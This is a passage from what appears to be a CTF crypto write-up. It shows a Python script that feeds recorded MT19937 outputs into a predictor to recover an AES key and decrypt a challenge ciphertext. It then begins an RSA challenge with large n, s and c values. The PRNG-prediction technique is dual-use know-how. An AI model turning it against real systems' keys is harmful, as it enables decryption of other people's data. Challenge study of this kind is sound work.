class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span 
class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES<br><span class="hljs-keyword">from</span> mt19937predictor <span class="hljs-keyword">import</span> MT19937Predictor<br><br>keys = [<span class="hljs-number">74737492451949886796883447380</span>,<br><span class="hljs-number">51358027370976380985099489502</span>,<br><span class="hljs-number">412762483065178295255791439485932171376749700084</span>, <span class="hljs-number">910689806</span>,<br><span class="hljs-number">1149695904</span>, <span class="hljs-number">3104053370</span>, <span class="hljs-number">221975799</span>, <span class="hljs-number">3823412020</span>, <span 
class="hljs-number">958468189</span>,<br><span class="hljs-number">3586356097</span>, <span class="hljs-number">340817801</span>, <span class="hljs-number">2878068849</span>, <span class="hljs-number">2732757663</span>, <span class="hljs-number">2018092082</span>,<br><span class="hljs-number">1847897227</span>, <span class="hljs-number">1759748212</span>, <span class="hljs-number">1295396426</span>, <span class="hljs-number">2794984001</span>, <span class="hljs-number">4265922173</span>,<br><span class="hljs-number">3532941962</span>, <span class="hljs-number">3649453440</span>, <span class="hljs-number">1086966694</span>, <span class="hljs-number">2188196779</span>, <span class="hljs-number">1036830362</span>,<br><span class="hljs-number">3114332204</span>, <span class="hljs-number">2720067903</span>, <span class="hljs-number">3763019658</span>, <span class="hljs-number">4220680032</span>, <span class="hljs-number">1434665040</span>,<br><span class="hljs-number">2867449357</span>, <span class="hljs-number">327630472</span>, <span class="hljs-number">4028025891</span>, <span class="hljs-number">1107232876</span>, <span class="hljs-number">1341894502</span>,<br><span class="hljs-number">3410775936</span>, <span class="hljs-number">792029308</span>, <span class="hljs-number">2140406850</span>, <span class="hljs-number">618481849</span>, <span class="hljs-number">3329607978</span>,<br><span class="hljs-number">1024829298</span>, <span class="hljs-number">1620771375</span>, <span class="hljs-number">1042727260</span>, <span class="hljs-number">1141119170</span>, <span class="hljs-number">2850063412</span>,<br><span class="hljs-number">722634918</span>, <span class="hljs-number">109575186</span>, <span class="hljs-number">1993029882</span>, <span class="hljs-number">2096912385</span>, <span class="hljs-number">866181039</span>,<br><span class="hljs-number">827908342</span>, <span class="hljs-number">1718528485</span>, <span class="hljs-number">1617437693</span>, <span 
class="hljs-number">3893036959</span>, <span class="hljs-number">2846991704</span>,<br><span class="hljs-number">3366375532</span>, <span class="hljs-number">2763086122</span>, <span class="hljs-number">2690998389</span>, <span class="hljs-number">1148589641</span>, <span class="hljs-number">1571939581</span>,<br><span class="hljs-number">2933947318</span>, <span class="hljs-number">4121295833</span>, <span class="hljs-number">3030689848</span>, <span class="hljs-number">1790011374</span>, <span class="hljs-number">109272014</span>,<br><span class="hljs-number">121093659</span>, <span class="hljs-number">4007439172</span>, <span class="hljs-number">831512040</span>, <span class="hljs-number">978840109</span>, <span class="hljs-number">3000990210</span>,<br><span class="hljs-number">3025633350</span>, <span class="hljs-number">1335144143</span>, <span class="hljs-number">4107810622</span>, <span class="hljs-number">1035611013</span>, <span class="hljs-number">3925921218</span>,<br><span class="hljs-number">1398042454</span>, <span class="hljs-number">1123546694</span>, <span class="hljs-number">4161792772</span>, <span class="hljs-number">1177640646</span>, <span class="hljs-number">4066189210</span>,<br><span class="hljs-number">2240592239</span>, <span class="hljs-number">508327944</span>, <span class="hljs-number">839225012</span>, <span class="hljs-number">1605466793</span>, <span class="hljs-number">2875695963</span>,<br><span class="hljs-number">626270177</span>, <span class="hljs-number">1371375933</span>, <span class="hljs-number">11364760</span>, <span class="hljs-number">3470778132</span>, <span class="hljs-number">1706915094</span>,<br><span class="hljs-number">1458410373</span>, <span class="hljs-number">98854289</span>, <span class="hljs-number">1392252258</span>, <span class="hljs-number">1560427103</span>, <span class="hljs-number">3615589636</span>,<br><span class="hljs-number">147666569</span>, <span class="hljs-number">1045773025</span>, <span 
class="hljs-number">4263298490</span>, <span class="hljs-number">3895751869</span>, <span class="hljs-number">2691680307</span>,<br><span class="hljs-number">1699526232</span>, <span class="hljs-number">3685180876</span>, <span class="hljs-number">729503966</span>, <span class="hljs-number">554847696</span>, <span class="hljs-number">1562590775</span>,<br><span class="hljs-number">3563661002</span>, <span class="hljs-number">963617489</span>, <span class="hljs-number">3181526105</span>, <span class="hljs-number">2184215744</span>, <span class="hljs-number">2144648457</span>,<br><span class="hljs-number">1109270973</span>, <span class="hljs-number">3071342721</span>, <span class="hljs-number">2842429183</span>, <span class="hljs-number">668733579</span>, <span class="hljs-number">1262667392</span>,<br><span class="hljs-number">772190169</span>, <span class="hljs-number">1000365415</span>, <span class="hljs-number">3453506497</span>, <span class="hljs-number">412844225</span>, <span class="hljs-number">9975293</span>, <span class="hljs-number">919025159</span>,<br><span class="hljs-number">3317679250</span>, <span class="hljs-number">2335686357</span>, <span class="hljs-number">1608848888</span>, <span class="hljs-number">2579223536</span>, <span class="hljs-number">1816878070</span>,<br><span class="hljs-number">3734808856</span>, <span class="hljs-number">269077113</span>, <span class="hljs-number">2396885783</span>, <span class="hljs-number">1147867931</span>, <span class="hljs-number">2331502665</span>,<br><span class="hljs-number">2928315805</span>, <span class="hljs-number">908907677</span>, <span class="hljs-number">1009287219</span>, <span class="hljs-number">1017406485</span>, <span class="hljs-number">3870217028</span>,<br><span class="hljs-number">1835376973</span>, <span class="hljs-number">890949168</span>, <span class="hljs-number">671845795</span>, <span class="hljs-number">3380480668</span>, <span class="hljs-number">4171623559</span>,<br><span 
class="hljs-number">1662988401</span>, <span class="hljs-number">3709126631</span>, <span class="hljs-number">2520677766</span>, <span class="hljs-number">1660449390</span>, <span class="hljs-number">120494599</span>,<br><span class="hljs-number">907225530</span>, <span class="hljs-number">3665272463</span>, <span class="hljs-number">136171352</span>, <span class="hljs-number">1758076339</span>, <span class="hljs-number">3009587924</span>,<br><span class="hljs-number">2866084549</span>, <span class="hljs-number">3656368543</span>, <span class="hljs-number">1692972691</span>, <span class="hljs-number">714237605</span>, <span class="hljs-number">892521830</span>,<br><span class="hljs-number">1942496649</span>, <span class="hljs-number">4241764492</span>, <span class="hljs-number">930308540</span>, <span class="hljs-number">3340229942</span>, <span class="hljs-number">773043293</span>,<br><span class="hljs-number">3514688079</span>, <span class="hljs-number">1318180965</span>, <span class="hljs-number">1669012263</span>, <span class="hljs-number">3638042505</span>, <span class="hljs-number">3025395295</span>,<br><span class="hljs-number">226129302</span>, <span class="hljs-number">153479541</span>, <span class="hljs-number">2764571825</span>, <span class="hljs-number">3421587858</span>, <span class="hljs-number">334668853</span>,<br><span class="hljs-number">1330796170</span>, <span class="hljs-number">218556632</span>, <span class="hljs-number">972714166</span>, <span class="hljs-number">922603164</span>, <span class="hljs-number">4024647445</span>,<br><span class="hljs-number">4233196368</span>, <span class="hljs-number">1249046751</span>, <span class="hljs-number">3667925019</span>, <span class="hljs-number">2276336634</span>, <span class="hljs-number">3644888947</span>,<br><span class="hljs-number">1444996806</span>, <span class="hljs-number">413210699</span>, <span class="hljs-number">2208048223</span>, <span class="hljs-number">3813568258</span>, <span 
class="hljs-number">2345486173</span>,<br><span class="hljs-number">487998086</span>, <span class="hljs-number">477969329</span>, <span class="hljs-number">3409170127</span>, <span class="hljs-number">3568976035</span>, <span class="hljs-number">3460493127</span>,<br><span class="hljs-number">2697206478</span>, <span class="hljs-number">1262489351</span>, <span class="hljs-number">4011219190</span>, <span class="hljs-number">1419296521</span>, <span class="hljs-number">1307871567</span>,<br><span class="hljs-number">270455245</span>, <span class="hljs-number">4245043905</span>, <span class="hljs-number">687578193</span>, <span class="hljs-number">1070246561</span>, <span class="hljs-number">185531160</span>,<br><span class="hljs-number">2626503659</span>, <span class="hljs-number">3372671141</span>, <span class="hljs-number">3673238883</span>, <span class="hljs-number">2542194104</span>, <span class="hljs-number">4260369384</span>,<br><span class="hljs-number">67076509</span>, <span class="hljs-number">4164858072</span>, <span class="hljs-number">3344428349</span>, <span class="hljs-number">2674528215</span>, <span class="hljs-number">2352981085</span>,<br><span class="hljs-number">4188340133</span>, <span class="hljs-number">2490407345</span>, <span class="hljs-number">2277623345</span>, <span class="hljs-number">578009254</span>, <span class="hljs-number">589898778</span>,<br><span class="hljs-number">2257425250</span>, <span class="hljs-number">4264855682</span>, <span class="hljs-number">3217088425</span>, <span class="hljs-number">1918678675</span>, <span class="hljs-number">2409396248</span>,<br><span class="hljs-number">366216060</span>, <span class="hljs-number">2318262020</span>, <span class="hljs-number">2695905062</span>, <span class="hljs-number">1588352782</span>, <span class="hljs-number">1427064824</span>,<br><span class="hljs-number">470125313</span>, <span class="hljs-number">3305196643</span>, <span class="hljs-number">1839661592</span>, <span 
class="hljs-number">2584820258</span>, <span class="hljs-number">299694866</span>,<br><span class="hljs-number">4205679150</span>, <span class="hljs-number">3105720803</span>, <span class="hljs-number">2804340888</span>, <span class="hljs-number">3893613342</span>, <span class="hljs-number">733876896</span>,<br><span class="hljs-number">232917987</span>, <span class="hljs-number">2727309654</span>, <span class="hljs-number">1790439074</span>, <span class="hljs-number">1927738154</span>, <span class="hljs-number">4017472905</span>,<br><span class="hljs-number">1863059250</span>, <span class="hljs-number">655457188</span>, <span class="hljs-number">3759472447</span>, <span class="hljs-number">4183317773</span>, <span class="hljs-number">797877611</span>,<br><span class="hljs-number">2699417810</span>, <span class="hljs-number">803278050</span>, <span class="hljs-number">3877877653</span>, <span class="hljs-number">1586583099</span>, <span class="hljs-number">3875432289</span>,<br><span class="hljs-number">111221042</span>, <span class="hljs-number">233407522</span>, <span class="hljs-number">3347300855</span>, <span class="hljs-number">3873882496</span>, <span class="hljs-number">3741842610</span>,<br><span class="hljs-number">717425034</span>, <span class="hljs-number">2557158550</span>, <span class="hljs-number">876205693</span>, <span class="hljs-number">683472955</span>, <span class="hljs-number">3676324193</span>,<br><span class="hljs-number">758448123</span>, <span class="hljs-number">1995439610</span>, <span class="hljs-number">2943722151</span>, <span class="hljs-number">1610689376</span>, <span class="hljs-number">4230997558</span>,<br><span class="hljs-number">802060680</span>, <span class="hljs-number">2861576590</span>, <span class="hljs-number">960427169</span>, <span class="hljs-number">2361123516</span>, <span class="hljs-number">2886027757</span>,<br><span class="hljs-number">271492995</span>, <span class="hljs-number">3597341957</span>, <span 
class="hljs-number">1973308613</span>, <span class="hljs-number">687254699</span>, <span class="hljs-number">2103809719</span>,<br><span class="hljs-number">1260885931</span>, <span class="hljs-number">2906748062</span>, <span class="hljs-number">873332944</span>, <span class="hljs-number">3671891228</span>, <span class="hljs-number">2490863425</span>,<br><span class="hljs-number">274650518</span>, <span class="hljs-number">990260178</span>, <span class="hljs-number">989305697</span>, <span class="hljs-number">3765783495</span>, <span class="hljs-number">3579353903</span>,<br><span class="hljs-number">1372910559</span>, <span class="hljs-number">165320956</span>, <span class="hljs-number">896735304</span>, <span class="hljs-number">3564054930</span>, <span class="hljs-number">2374613969</span>,<br><span class="hljs-number">786938917</span>, <span class="hljs-number">3955168292</span>, <span class="hljs-number">2134822172</span>, <span class="hljs-number">1403480802</span>, <span class="hljs-number">1340392765</span>,<br><span class="hljs-number">3154014116</span>, <span class="hljs-number">1793814283</span>, <span class="hljs-number">1981841272</span>, <span class="hljs-number">1873394217</span>, <span class="hljs-number">4217089972</span>,<br><span class="hljs-number">3403224767</span>, <span class="hljs-number">111486932</span>, <span class="hljs-number">1370301502</span>, <span class="hljs-number">1137722044</span>, <span class="hljs-number">1454768737</span>,<br><span class="hljs-number">2817161685</span>, <span class="hljs-number">1373532601</span>, <span class="hljs-number">88198402</span>, <span class="hljs-number">1162901466</span>, <span class="hljs-number">1764878443</span>,<br><span class="hljs-number">3204368881</span>, <span class="hljs-number">764246346</span>, <span class="hljs-number">3192119660</span>, <span class="hljs-number">876165427</span>, <span class="hljs-number">4104033361</span>,<br><span class="hljs-number">2154934077</span>, <span 
class="hljs-number">1561430573</span>, <span class="hljs-number">826991304</span>, <span class="hljs-number">849458135</span>, <span class="hljs-number">4188058136</span>,<br><span class="hljs-number">1199351023</span>, <span class="hljs-number">2127952015</span>, <span class="hljs-number">2094038064</span>, <span class="hljs-number">300699273</span>, <span class="hljs-number">3378157804</span>,<br><span class="hljs-number">6679715</span>, <span class="hljs-number">559293910</span>, <span class="hljs-number">3028818176</span>, <span class="hljs-number">2490265745</span>, <span class="hljs-number">3646800433</span>,<br><span class="hljs-number">1746603729</span>, <span class="hljs-number">1531309519</span>, <span class="hljs-number">18564847</span>, <span class="hljs-number">3452425344</span>, <span class="hljs-number">1989426082</span>,<br><span class="hljs-number">2251367880</span>, <span class="hljs-number">1426356258</span>, <span class="hljs-number">2425736463</span>, <span class="hljs-number">1600248295</span>, <span class="hljs-number">955344576</span>,<br><span class="hljs-number">3502485031</span>, <span class="hljs-number">1323390407</span>, <span class="hljs-number">399691485</span>, <span class="hljs-number">1835777771</span>, <span class="hljs-number">1828335677</span>,<br><span class="hljs-number">3348082301</span>, <span class="hljs-number">3687268482</span>, <span class="hljs-number">2457400649</span>, <span class="hljs-number">3368374393</span>, <span class="hljs-number">1119303358</span>,<br><span class="hljs-number">1270433121</span>, <span class="hljs-number">3059691677</span>, <span class="hljs-number">2392910075</span>, <span class="hljs-number">591224638</span>, <span class="hljs-number">1311675618</span>,<br><span class="hljs-number">4122050325</span>, <span class="hljs-number">4014348903</span>, <span class="hljs-number">2095907405</span>, <span class="hljs-number">1519824911</span>, <span class="hljs-number">2825776887</span>,<br><span 
class="hljs-number">3354142321</span>, <span class="hljs-number">1098235797</span>, <span class="hljs-number">1481266867</span>, <span class="hljs-number">1051367302</span>, <span class="hljs-number">1263016096</span>,<br><span class="hljs-number">1336057651</span>, <span class="hljs-number">1683842359</span>, <span class="hljs-number">4054448354</span>, <span class="hljs-number">1491994207</span>, <span class="hljs-number">1160110019</span>,<br><span class="hljs-number">3222808831</span>, <span class="hljs-number">177510926</span>, <span class="hljs-number">423347477</span>, <span class="hljs-number">803602771</span>, <span class="hljs-number">2683641253</span>,<br><span class="hljs-number">2919035439</span>, <span class="hljs-number">2485161789</span>, <span class="hljs-number">3378544338</span>, <span class="hljs-number">1610409532</span>, <span class="hljs-number">1545641821</span>,<br><span class="hljs-number">546762619</span>, <span class="hljs-number">2395983270</span>, <span class="hljs-number">3838745031</span>, <span class="hljs-number">789177414</span>, <span class="hljs-number">2123719243</span>,<br><span class="hljs-number">3476088109</span>, <span class="hljs-number">1615713790</span>, <span class="hljs-number">1335041829</span>, <span class="hljs-number">4006963851</span>, <span class="hljs-number">1700197865</span>,<br><span class="hljs-number">73798124</span>, <span class="hljs-number">1251950799</span>, <span class="hljs-number">2448692292</span>, <span class="hljs-number">937465221</span>, <span class="hljs-number">2191277155</span>,<br><span class="hljs-number">2283183462</span>, <span class="hljs-number">3235943428</span>, <span class="hljs-number">1888733145</span>, <span class="hljs-number">1637420644</span>, <span class="hljs-number">2906472352</span>,<br><span class="hljs-number">538528848</span>, <span class="hljs-number">1787881095</span>, <span class="hljs-number">2527345959</span>, <span class="hljs-number">816324140</span>, <span 
class="hljs-number">780626095</span>,<br><span class="hljs-number">3958671235</span>, <span class="hljs-number">1060151404</span>, <span class="hljs-number">3939612973</span>, <span class="hljs-number">720163439</span>, <span class="hljs-number">3130037256</span>,<br><span class="hljs-number">868218434</span>, <span class="hljs-number">594717218</span>, <span class="hljs-number">2378649142</span>, <span class="hljs-number">630567292</span>, <span class="hljs-number">272416131</span>,<br><span class="hljs-number">2656750985</span>, <span class="hljs-number">2254309115</span>, <span class="hljs-number">398769631</span>, <span class="hljs-number">144191385</span>, <span class="hljs-number">3584257427</span>,<br><span class="hljs-number">2276368553</span>, <span class="hljs-number">4037163602</span>, <span class="hljs-number">2651140730</span>, <span class="hljs-number">2231274829</span>, <span class="hljs-number">1953622167</span>,<br><span class="hljs-number">4083152642</span>, <span class="hljs-number">3006733661</span>, <span class="hljs-number">929392152</span>, <span class="hljs-number">843949652</span>, <span class="hljs-number">2714951407</span>,<br><span class="hljs-number">810363743</span>, <span class="hljs-number">1283798592</span>, <span class="hljs-number">3121903325</span>, <span class="hljs-number">1988057118</span>, <span class="hljs-number">356119324</span>,<br><span class="hljs-number">1904222878</span>, <span class="hljs-number">4044843055</span>, <span class="hljs-number">112669104</span>, <span class="hljs-number">868692487</span>, <span class="hljs-number">1115920155</span>,<br><span class="hljs-number">1623439582</span>, <span class="hljs-number">488326378</span>, <span class="hljs-number">148287535</span>, <span class="hljs-number">3338996246</span>, <span class="hljs-number">2166938666</span>,<br><span class="hljs-number">3797453833</span>, <span class="hljs-number">1474427255</span>, <span class="hljs-number">1386753952</span>, <span 
class="hljs-number">3317126798</span>, <span class="hljs-number">2190807666</span>,<br><span class="hljs-number">4259624962</span>, <span class="hljs-number">3066765455</span>, <span class="hljs-number">2382942891</span>, <span class="hljs-number">4046402452</span>, <span class="hljs-number">3243966738</span>,<br><span class="hljs-number">1774858251</span>, <span class="hljs-number">3181254579</span>, <span class="hljs-number">2171453049</span>, <span class="hljs-number">905778132</span>, <span class="hljs-number">1409024919</span>,<br><span class="hljs-number">4082347550</span>, <span class="hljs-number">1308497825</span>, <span class="hljs-number">3944454243</span>, <span class="hljs-number">1681570359</span>, <span class="hljs-number">3622008213</span>,<br><span class="hljs-number">1130389974</span>, <span class="hljs-number">3937594426</span>, <span class="hljs-number">4193387111</span>, <span class="hljs-number">4156444245</span>, <span class="hljs-number">1665819644</span>,<br><span class="hljs-number">4099931325</span>, <span class="hljs-number">546382740</span>, <span class="hljs-number">3459524364</span>, <span class="hljs-number">3215392046</span>, <span class="hljs-number">628790677</span>,<br><span class="hljs-number">2460115724</span>, <span class="hljs-number">4154656625</span>, <span class="hljs-number">1738275004</span>, <span class="hljs-number">372632247</span>, <span class="hljs-number">3901053671</span>,<br><span class="hljs-number">1968302733</span>, <span class="hljs-number">1542557146</span>, <span class="hljs-number">954360221</span>, <span class="hljs-number">94489421</span>, <span class="hljs-number">2526265974</span>,<br><span class="hljs-number">3493620125</span>, <span class="hljs-number">227040704</span>, <span class="hljs-number">1966827767</span>, <span class="hljs-number">2710288704</span>, <span class="hljs-number">1777503765</span>,<br><span class="hljs-number">3060587047</span>, <span class="hljs-number">2922448684</span>, <span 
class="hljs-number">1818271608</span>, <span class="hljs-number">3774695159</span>, <span class="hljs-number">198891092</span>,<br><span class="hljs-number">1892315134</span>, <span class="hljs-number">1988189925</span>, <span class="hljs-number">1877360903</span>, <span class="hljs-number">176031450</span>, <span class="hljs-number">782372078</span>,<br><span class="hljs-number">2630033970</span>, <span class="hljs-number">222585085</span>, <span class="hljs-number">1784220674</span>, <span class="hljs-number">187019927</span>, <span class="hljs-number">3793161227</span>,<br><span class="hljs-number">275394451</span>, <span class="hljs-number">3620112924</span>, <span class="hljs-number">1046758031</span>, <span class="hljs-number">794695465</span>, <span class="hljs-number">4020417715</span>,<br><span class="hljs-number">1036350909</span>, <span class="hljs-number">1034143101</span>, <span class="hljs-number">130770292</span>, <span class="hljs-number">3376762604</span>, <span class="hljs-number">3099991375</span>,<br><span class="hljs-number">1317943524</span>, <span class="hljs-number">538393453</span>, <span class="hljs-number">1676278328</span>, <span class="hljs-number">3728445031</span>, <span class="hljs-number">2444153711</span>,<br><span class="hljs-number">1294577644</span>, <span class="hljs-number">3255702608</span>, <span class="hljs-number">382221508</span>, <span class="hljs-number">501348604</span>, <span class="hljs-number">1545416914</span>,<br><span class="hljs-number">4046130944</span>, <span class="hljs-number">1518955393</span>, <span class="hljs-number">3919525514</span>, <span class="hljs-number">1729967634</span>, <span class="hljs-number">2572204860</span>,<br><span class="hljs-number">3777225961</span>, <span class="hljs-number">1646036822</span>, <span class="hljs-number">475018472</span>, <span class="hljs-number">2247517569</span>, <span class="hljs-number">4257731164</span>,<br><span class="hljs-number">1111295866</span>, <span 
class="hljs-number">524303023</span>, <span class="hljs-number">3981652986</span>, <span class="hljs-number">4072216404</span>, <span class="hljs-number">3747688429</span>,<br><span class="hljs-number">1885894640</span>, <span class="hljs-number">833446526</span>, <span class="hljs-number">3955045968</span>, <span class="hljs-number">1703975805</span>, <span class="hljs-number">1141801012</span>,<br><span class="hljs-number">2437322873</span>, <span class="hljs-number">2732846667</span>, <span class="hljs-number">1371506834</span>, <span class="hljs-number">669098384</span>, <span class="hljs-number">1963802511</span>,<br><span class="hljs-number">1542039</span>, <span class="hljs-number">728580454</span>, <span class="hljs-number">4041454310</span>, <span class="hljs-number">1019581040</span>, <span class="hljs-number">3144560205</span>,<br><span class="hljs-number">1329189307</span>, <span class="hljs-number">1043039655</span>, <span class="hljs-number">1028345076</span>, <span class="hljs-number">3541168610</span>, <span class="hljs-number">2082983922</span>,<br><span class="hljs-number">1305525731</span>, <span class="hljs-number">1078333930</span>, <span class="hljs-number">556043109</span>, <span class="hljs-number">3570861415</span>, <span class="hljs-number">1623319076</span>,<br><span class="hljs-number">3514585273</span>, <span class="hljs-number">223719132</span>, <span class="hljs-number">4031808254</span>, <span class="hljs-number">2549094947</span>, <span class="hljs-number">3825858427</span>,<br><span class="hljs-number">3214724358</span>, <span class="hljs-number">1835103180</span>, <span class="hljs-number">2471774591</span>, <span class="hljs-number">2111554082</span>, <span class="hljs-number">2948121215</span>,<br><span class="hljs-number">1362405065</span>, <span class="hljs-number">3765638194</span>, <span class="hljs-number">491471279</span>, <span class="hljs-number">2479158340</span>, <span class="hljs-number">3749279021</span>,<br><span 
class="hljs-number">3306251008</span>, <span class="hljs-number">2577577664</span>, <span class="hljs-number">1245538106</span>, <span class="hljs-number">503105027</span>, <span class="hljs-number">139202844</span>,<br><span class="hljs-number">2287890849</span>, <span class="hljs-number">3563168099</span>, <span class="hljs-number">1467460138</span>, <span class="hljs-number">3922094655</span>, <span class="hljs-number">1903765924</span>,<br><span class="hljs-number">3858903218</span>, <span class="hljs-number">3343562703</span>, <span class="hljs-number">2145132444</span>, <span class="hljs-number">1134537221</span>, <span class="hljs-number">2942539446</span>,<br><span class="hljs-number">914603375</span>, <span class="hljs-number">2155053085</span>, <span class="hljs-number">2864704965</span>, <span class="hljs-number">1971547127</span>, <span class="hljs-number">1892432263</span>,<br><span class="hljs-number">2604528206</span>, <span class="hljs-number">3387176542</span>, <span class="hljs-number">361652931</span>, <span class="hljs-number">2305859318</span>, <span class="hljs-number">1345198505</span>,<br><span class="hljs-number">2416327840</span>, <span class="hljs-number">887059258</span>, <span class="hljs-number">3219763770</span>, <span class="hljs-number">316636299</span>, <span class="hljs-number">307065443</span>,<br><span class="hljs-number">431437125</span>, <span class="hljs-number">4279494318</span>, <span class="hljs-number">220513368</span>, <span class="hljs-number">2362459616</span>, <span class="hljs-number">3712600310</span>,<br><span class="hljs-number">2105434588</span>, <span class="hljs-number">2938672182</span>, <span class="hljs-number">3316109731</span>, <span class="hljs-number">850677909</span>, <span class="hljs-number">1593089633</span>,<br><span class="hljs-number">1448569654</span>, <span class="hljs-number">2885245137</span>, <span class="hljs-number">3269946753</span>, <span class="hljs-number">885150079</span>, <span 
class="hljs-number">2358168430</span>,<br><span class="hljs-number">1785698607</span>, <span class="hljs-number">1757002566</span>, <span class="hljs-number">197277094</span>, <span class="hljs-number">47259139</span>, <span class="hljs-number">2710959991</span>,<br><span class="hljs-number">710476854</span>, <span class="hljs-number">1929434500</span>, <span class="hljs-number">1732169408</span>, <span class="hljs-number">381305673</span>, <span class="hljs-number">2982171232</span>,<br><span class="hljs-number">486112880</span>, <span class="hljs-number">3651033563</span>, <span class="hljs-number">734915423</span>, <span class="hljs-number">27291312</span>, <span class="hljs-number">93262695</span>, <span class="hljs-number">3206874794</span>,<br><span class="hljs-number">1595912125</span>, <span class="hljs-number">643556702</span>, <span class="hljs-number">2929755197</span>, <span class="hljs-number">1043917347</span>, <span class="hljs-number">3181953869</span>,<br><span class="hljs-number">3059173850</span>, <span class="hljs-number">986850461</span>, <span class="hljs-number">947059764</span>]<br>c = <span class="hljs-string">b'\xd1\xfb\xd3\xf0U\x14\x18\xa9Yf=\xa6\x7fJ\xd0aZ=\xf7\xf6\x1e]\xe7\x07\xbd\x0b\xc9\xf8\xe7k\xa7\x16\xc1Z:\xbf\xde\xea=3\xe0\x82\xf0\xca\xd2R\x91\xf5\x0f\xd1\x06\x99G\xf6\x8dh\x9c\x14Wi\xaf\xdbFL'</span><br>p = MT19937Predictor()<br><span class="hljs-comment"># replay each observed output at the bit width it was drawn with,</span><br><span class="hljs-comment"># then predict the next 128-bit draw, which is the AES key</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(keys)):<br>    <span class="hljs-keyword">if</span> i == <span class="hljs-number">0</span> <span class="hljs-keyword">or</span> i == <span class="hljs-number">1</span>:<br>        p.setrandbits(keys[i], <span class="hljs-number">96</span>)<br>    <span class="hljs-keyword">elif</span> i == <span class="hljs-number">2</span>:<br>        p.setrandbits(keys[i], <span 
class="hljs-number">160</span>)<br>    <span class="hljs-keyword">else</span>:<br>        p.setrandbits(keys[i], <span class="hljs-number">32</span>)<br>key = long_to_bytes(p.getrandbits(<span class="hljs-number">128</span>))<br>cipher = AES.new(key, AES.MODE_ECB)<br><span class="hljs-built_in">print</span>(cipher.decrypt(c))<br></code></pre></td></tr></table></figure><h4 id="rsa1"><a href="#rsa1" class="headerlink" title="rsa1"></a>rsa1</h4><figure class="highlight python"><table><tr><td 
class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> libnum <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> sympy <span class="hljs-keyword">import</span> Symbol, solve<br><br>n = <span class="hljs-number">26305215103655644423271873654270896239286789695124090349749665534703077917412304839568833642664450313935099298310980853882272879981733372730292018544572625316902809164514982172181951319743072017697845536018391193871280565807620618786757590917994266113737303548654644579447152708491947981939693209377062932887079053535685222915049638973744785910187846488048054614595896905717548173503097932486976548606688284094985163387830871173351156872303901802063874643159872076045421856161697020709841563253543301088673347562874178275457662923268303751458373213379823091743254295392098852050657389100668196543581156089543387981749</span><br>s = <span class="hljs-number">4323761888398018609852335503896306767680254689118307249919076945474100280053222216117890335097280655812579700210142850972114032619375512508094444700268269861295454361479936323488734938967486887087065985770337167952405916865514342667568344884512919390473013721005783345127779614050256684329541419938215219111638334871769224566807758669615177139619330644265349270609231736366888506999373399354453570974856230273436956657673552797254044789898850371608837651642705304346761776584170067536342839950077554921714223414452726231759701672899981770205900654174771977192152231671555687060576625055995576371428030016472160229195</span><br>c = <span 
class="hljs-number">1852487987504645476578041929190216150518711904931725744020264536218454385698003789144613974739647260688419029551969305082570239830237503535607335403043909247907649335028049187994267623254327203500961977644866836763167475127002542247169760480730932894881173021179607719456260527306824800306708406260495318098109260282526908244319482179526753325954234528078942388531371501119875640823867521229496416923186675012178289139297498253888375946049965496491667264671356136526849762166991826051231812198746408720348894319244724465612055365790464376881105563452686764212197728274778601941367638608774258712031070628546763291462
